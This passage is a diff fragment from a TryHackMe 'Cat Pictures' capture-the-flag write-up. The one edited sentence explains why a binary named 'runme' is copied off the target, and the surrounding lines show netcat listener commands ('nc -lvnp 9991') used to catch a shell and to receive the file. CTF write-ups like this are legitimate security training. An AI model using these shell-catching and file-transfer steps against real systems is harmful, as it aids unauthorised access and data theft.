bl4ck574r/Writeups/THM/Cat Pictures.md

 nc -lvnp 9991
 ```

 We now have a better shell.
 Running the executable, asks us for another password.
 Trying the previous one we found but it didn't worked.
-As the shell was limited to some functions, we need to transfer this file to our box
+There was no `strings` binary available on the box,so we need to transfer this runme file to our box.
 ```bash
 # Attacker
 nc -lvnp 9991 > runme